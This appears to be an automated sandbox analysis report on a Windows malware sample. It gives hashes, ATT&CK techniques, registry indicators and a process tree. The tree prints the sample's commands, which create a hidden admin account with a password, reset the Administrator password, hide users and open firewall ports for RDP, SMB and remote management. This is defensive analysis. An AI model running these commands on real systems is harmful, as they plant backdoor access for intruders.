2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50

Analysis

max time kernel
83s
max time network
18s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
09-09-2024 21:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Size

1.2MB
MD5

1a027bd2e0bd67f33bb6ad6f4029b1c6
SHA1

763e46995b5401cb489a25c3b947000368911d4d
SHA256

2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50
SHA512

d27761d31cca6c425e555f85f9e12b076ce62efca1756f15e65d3bf1013ca660ad47464b6785d10c815e2b82f8de953db6a45b98e079fa462b73ac613434849f
SSDEEP

24576:XD7Xr5my0DPP23Iy5YAmRW6B8If0s83I4eqowSwa1X9tqY7Jxiq+n:XD7Xroy0DPP23Iy5YAmw6B8If0F3Iwo4

Score

10^/10

defense_evasion discovery evasion execution persistence privilege_escalation

Malware Config

Signatures

Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0"	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
968	powershell.exe
1152	powershell.exe
360	powershell.exe
1740	powershell.exe
2960	powershell.exe
884	powershell.exe
940	powershell.exe
832	powershell.exe
2776	powershell.exe
2200	powershell.exe
2860	powershell.exe
3016	powershell.exe
2704	powershell.exe
2816	powershell.exe
1676	powershell.exe
376	powershell.exe
948	powershell.exe

Disables taskbar notifications via registry modification
evasion

Modifies Windows Firewall 2 TTPs 7 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2564	netsh.exe
912	netsh.exe
1760	netsh.exe
1908	netsh.exe
3032	netsh.exe
2196	netsh.exe
956	netsh.exe

Modifies WinLogon 2 TTPs 5 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Billros = "0"	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Administrator = "0"	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe

Power Settings 1 TTPs 7 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1972	powercfg.exe
1372	powercfg.exe
2980	powercfg.exe
2660	powercfg.exe
2556	powercfg.exe
1344	powercfg.exe
1264	powercfg.exe

Hide Artifacts: Hidden Users 1 TTPs 2 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Billros = "0"	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Administrator = "0"	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\windows\resources\themes\BComp.theme	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 24 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\software\microsoft\internet explorer\main	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Default_Page_URL = "google.com"	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe

Modifies Internet Explorer start page 1 TTPs 1 IoCs

stealer

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Start Page = "google.com"	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe

Modifies data under HKEY_USERS 33 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Search\SearchboxTaskbarMode = "0"	reg.exe
Set value (int)	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackDocks = "0"	reg.exe
Key created	\REGISTRY\USER\DEFAULT	reg.exe
Set value (int)	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\StartupPage = "1"	reg.exe
Set value (int)	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden = "1"	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel	reg.exe
Set value (int)	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\AllItemsIconView = "1"	reg.exe
Key created	\REGISTRY\USER\Default	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes	reg.exe
Set value (str)	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\Installtheme = "C:\\windows\\resources\\themes\\BComp.theme"	reg.exe
Key created	\REGISTRY\USER\DEFAULT\software\microsoft\windows\currentversion\policies\explorer	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Search	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People	reg.exe
Key created	\REGISTRY\USER\DEFAULT	reg.exe
Set value (int)	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_trackProgs = "0"	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced	reg.exe
Key created	\REGISTRY\USER\DEFAULT	reg.exe
Set value (int)	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontUsePowerShellOnWinX = "1"	reg.exe
Set value (str)	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\CurrentTheme = "C:\\windows\\resources\\themes\\BComp.theme"	reg.exe
Key created	\REGISTRY\USER\DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager	reg.exe
Set value (int)	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager\SystemPaneSuggestionsEnabled = "0"	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Policies\Microsoft\Windows\Personalization	reg.exe
Set value (str)	\REGISTRY\USER\DEFAULT\Software\Policies\Microsoft\Windows\Personalization\ThemeFile = "C:\\windows\\resources\\themes\\BComp.theme"	reg.exe
Set value (int)	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\TaskbarMn = "0"	reg.exe
Key created	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel	reg.exe
Set value (int)	\REGISTRY\USER\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTaskViewButton = "0"	reg.exe

Runs net.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 33 IoCs

pid	Process
2896	net.exe
2876	net.exe
2884	net.exe
2188	net.exe
2564	netsh.exe
912	netsh.exe
2704	powershell.exe
1908	netsh.exe
1760	netsh.exe
2868	reg.exe
2816	powershell.exe
2904	reg.exe
2588	reg.exe
628	reg.exe
3028	reg.exe
1648	reg.exe
3032	netsh.exe
588	reg.exe
2860	reg.exe
2992	reg.exe
2196	netsh.exe
2112	reg.exe
2656	reg.exe
2868	netsh.exe
904	net.exe
3068	reg.exe
956	netsh.exe
2216	reg.exe
1716	reg.exe
1988	reg.exe
1496	reg.exe
1196	reg.exe
568	reg.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
376	powershell.exe
360	powershell.exe
832	powershell.exe
940	powershell.exe
1740	powershell.exe
884	powershell.exe
3016	powershell.exe
2776	powershell.exe
2200	powershell.exe
1676	powershell.exe
2860	powershell.exe
2960	powershell.exe
2704	powershell.exe
1152	powershell.exe
968	powershell.exe
2816	powershell.exe
948	powershell.exe

Suspicious use of AdjustPrivilegeToken 31 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2980	powercfg.exe
Token: SeShutdownPrivilege	1264	powercfg.exe
Token: SeDebugPrivilege	376	powershell.exe
Token: SeDebugPrivilege	360	powershell.exe
Token: SeDebugPrivilege	832	powershell.exe
Token: SeDebugPrivilege	940	powershell.exe
Token: SeDebugPrivilege	1740	powershell.exe
Token: SeDebugPrivilege	884	powershell.exe
Token: SeDebugPrivilege	3016	powershell.exe
Token: SeDebugPrivilege	2776	powershell.exe
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeDebugPrivilege	1676	powershell.exe
Token: SeDebugPrivilege	2860	powershell.exe
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeShutdownPrivilege	1344	powercfg.exe
Token: SeShutdownPrivilege	2660	powercfg.exe
Token: SeDebugPrivilege	2704	powershell.exe
Token: SeDebugPrivilege	1152	powershell.exe
Token: SeShutdownPrivilege	2556	powercfg.exe
Token: SeShutdownPrivilege	1972	powercfg.exe
Token: SeDebugPrivilege	968	powershell.exe
Token: SeRestorePrivilege	2588	reg.exe
Token: SeShutdownPrivilege	1972	powercfg.exe
Token: SeShutdownPrivilege	1972	powercfg.exe
Token: SeShutdownPrivilege	1972	powercfg.exe
Token: SeShutdownPrivilege	1972	powercfg.exe
Token: SeCreatePagefilePrivilege	1972	powercfg.exe
Token: SeDebugPrivilege	2816	powershell.exe
Token: SeShutdownPrivilege	1372	powercfg.exe
Token: SeRestorePrivilege	1988	reg.exe
Token: SeDebugPrivilege	948	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2888 wrote to memory of 2768	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	29
PID 2888 wrote to memory of 2768	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	29
PID 2888 wrote to memory of 2768	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	29
PID 2888 wrote to memory of 2768	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	29
PID 2888 wrote to memory of 2768	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	29
PID 2888 wrote to memory of 2168	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	30
PID 2888 wrote to memory of 2168	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	30
PID 2888 wrote to memory of 2168	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	30
PID 2888 wrote to memory of 2168	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	30
PID 2888 wrote to memory of 2168	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	30
PID 2888 wrote to memory of 2292	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	31
PID 2888 wrote to memory of 2292	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	31
PID 2888 wrote to memory of 2292	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	31
PID 2888 wrote to memory of 2292	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	31
PID 2888 wrote to memory of 2292	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	31
PID 2888 wrote to memory of 1996	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	32
PID 2888 wrote to memory of 1996	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	32
PID 2888 wrote to memory of 1996	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	32
PID 2888 wrote to memory of 1996	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	32
PID 2888 wrote to memory of 1996	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	32
PID 2292 wrote to memory of 2896	2292	cmd.exe	37
PID 2292 wrote to memory of 2896	2292	cmd.exe	37
PID 2292 wrote to memory of 2896	2292	cmd.exe	37
PID 2292 wrote to memory of 2896	2292	cmd.exe	37
PID 2292 wrote to memory of 2896	2292	cmd.exe	37
PID 1996 wrote to memory of 2876	1996	cmd.exe	38
PID 1996 wrote to memory of 2876	1996	cmd.exe	38
PID 1996 wrote to memory of 2876	1996	cmd.exe	38
PID 1996 wrote to memory of 2876	1996	cmd.exe	38
PID 1996 wrote to memory of 2876	1996	cmd.exe	38
PID 2768 wrote to memory of 2884	2768	cmd.exe	39
PID 2768 wrote to memory of 2884	2768	cmd.exe	39
PID 2768 wrote to memory of 2884	2768	cmd.exe	39
PID 2768 wrote to memory of 2884	2768	cmd.exe	39
PID 2768 wrote to memory of 2884	2768	cmd.exe	39
PID 2876 wrote to memory of 2856	2876	net.exe	40
PID 2876 wrote to memory of 2856	2876	net.exe	40
PID 2876 wrote to memory of 2856	2876	net.exe	40
PID 2896 wrote to memory of 2892	2896	net.exe	41
PID 2896 wrote to memory of 2892	2896	net.exe	41
PID 2896 wrote to memory of 2892	2896	net.exe	41
PID 2168 wrote to memory of 2188	2168	cmd.exe	42
PID 2168 wrote to memory of 2188	2168	cmd.exe	42
PID 2168 wrote to memory of 2188	2168	cmd.exe	42
PID 2168 wrote to memory of 2188	2168	cmd.exe	42
PID 2168 wrote to memory of 2188	2168	cmd.exe	42
PID 2884 wrote to memory of 3028	2884	net.exe	43
PID 2884 wrote to memory of 3028	2884	net.exe	43
PID 2884 wrote to memory of 3028	2884	net.exe	43
PID 2188 wrote to memory of 2712	2188	net.exe	44
PID 2188 wrote to memory of 2712	2188	net.exe	44
PID 2188 wrote to memory of 2712	2188	net.exe	44
PID 2888 wrote to memory of 2788	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	45
PID 2888 wrote to memory of 2788	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	45
PID 2888 wrote to memory of 2788	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	45
PID 2888 wrote to memory of 2788	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	45
PID 2888 wrote to memory of 2788	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	45
PID 2888 wrote to memory of 2676	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	46
PID 2888 wrote to memory of 2676	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	46
PID 2888 wrote to memory of 2676	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	46
PID 2888 wrote to memory of 2676	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	46
PID 2888 wrote to memory of 2676	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	46
PID 2888 wrote to memory of 2672	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	47
PID 2888 wrote to memory of 2672	2888	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe	47

System policy modification 1 TTPs 7 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\HideSCAHealth = "1"	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\SoftwareSASGeneration = "3"	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ = "0"	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer	2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe

C:\Users\Admin\AppData\Local\Temp\2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
"C:\Users\Admin\AppData\Local\Temp\2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe"
1⤵
- Modifies visibility of file extensions in Explorer
- Modifies WinLogon
- Hide Artifacts: Hidden Users
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies Internet Explorer start page
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "net user /add BillRos d3troittAlk4959toGetherabov31$9qu1tedark40able4$7Hugeloudchord /yes"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2768
- - C:\Windows\system32\net.exe
    net user /add BillRos d3troittAlk4959toGetherabov31$9qu1tedark40able4$7Hugeloudchord /yes
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    PID:2884
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user /add BillRos d3troittAlk4959toGetherabov31$9qu1tedark40able4$7Hugeloudchord /yes
      4⤵
      PID:3028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "net user billros /active"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2168
- - C:\Windows\system32\net.exe
    net user billros /active
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    PID:2188
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user billros /active
      4⤵
      PID:2712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "net localgroup administrators" /add billros
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2292
- - C:\Windows\system32\net.exe
    net localgroup administrators /add billros
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    PID:2896
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators /add billros
      4⤵
      PID:2892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "net user administrator Root48wAve53pr0pertyintere$tk3epoh74ship58walkliquiddance64 /yes"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1996
- - C:\Windows\system32\net.exe
    net user administrator Root48wAve53pr0pertyintere$tk3epoh74ship58walkliquiddance64 /yes
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    PID:2876
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user administrator Root48wAve53pr0pertyintere$tk3epoh74ship58walkliquiddance64 /yes
      4⤵
      PID:2856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "net user administrator /active"
  2⤵
  PID:2788
- - C:\Windows\system32\net.exe
    net user administrator /active
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:904
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user administrator /active
      4⤵
      PID:2124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "powershell -command set-localuser billros -passwordneverexpires $true"
  2⤵
  PID:2676
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command set-localuser billros -passwordneverexpires $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "powershell -command set-localuser administrator -passwordneverexpires $true"
  2⤵
  PID:2672
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command set-localuser administrator -passwordneverexpires $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh int tcp set global chimney=disabled rss=disabled netdma=disabled
  2⤵
  PID:2692
- - C:\Windows\system32\netsh.exe
    netsh int tcp set global chimney=disabled rss=disabled netdma=disabled
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh firewall set icmp 8 enable
  2⤵
  PID:2752
- - C:\Windows\system32\netsh.exe
    netsh firewall set icmp 8 enable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="ICMP Allow incoming V4 echo request" protocol=icmpv4:8,any dir=in action=allow profile=any
  2⤵
  PID:288
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="ICMP Allow incoming V4 echo request" protocol=icmpv4:8,any dir=in action=allow profile=any
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:3032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="DWRCC" protocol=tcp localport=6129 dir=in action=allow profile=any
  2⤵
  PID:2468
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="DWRCC" protocol=tcp localport=6129 dir=in action=allow profile=any
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name=Netlogon protocol=tcp localport=445 dir=in action=allow profile=any
  2⤵
  PID:2316
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name=Netlogon protocol=tcp localport=445 dir=in action=allow profile=any
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name=RDP protocol=tcp localport=3389 dir=in action=allow profile=any
  2⤵
  PID:920
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name=RDP protocol=tcp localport=3389 dir=in action=allow profile=any
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall set rule group="Windows Remote Management" new enable=yes profile=any
  2⤵
  PID:2364
